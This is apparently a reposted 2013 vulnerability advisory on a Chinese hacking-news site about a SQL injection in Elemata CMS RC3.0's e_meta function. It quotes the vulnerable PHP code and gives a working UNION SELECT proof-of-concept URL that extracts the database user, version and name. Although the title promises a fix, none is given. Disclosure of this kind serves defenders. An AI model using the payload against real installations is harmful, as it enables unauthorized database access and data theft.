记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Elemata CMS RC3.0 (global.php, id param)SQL注入及修复

2013-06-25 15:35

# 标题   : Elemata CMS RC3.0 SQL Injection
# 漏洞作者 : CWH Underground
# 网站      : www.2600.in.th
# 开发者网址 : http://www.elemata.com/
# 下载地址 : http://jaist.dl.sourceforge.net/project/elematacms/Elemata%203.x/ElemataRC3.0.zip
# 影响版本        : RC 3.0
# 已测试平台      : Window and Linux

    
##############################
缺陷: SQL Injection
##############################
    
/functions/global.php (LINE: 24-30)
    
----------------------------------------------------------------------------- 
function e_meta($id)
{
   include ("Connections/default.php");
   mysql_select_db($database_default, $default);
   $query_meta = "SELECT * FROM posts WHERE id = '$id'";
   $meta = mysql_query($query_meta, $default) or die(mysql_error());
   $row_meta = mysql_fetch_assoc($meta);
-----------------------------------------------------------------------------     
    
#####################################################
sql注射概述
#####################################################
    
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
   
POC:
   
http://www.hackdig.com /elemata/?id=-1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%28user%28%29,0x3a3a,version%28%29,0x3a3a,database%28%29%29,NULL,NULL,NULL,NULL--+
 

 

知识来源: www.2cto.com/Article/201306/222533.html

阅读:100263 | 评论:0 | 标签:注入 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“Elemata CMS RC3.0 (global.php, id param)SQL注入及修复”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词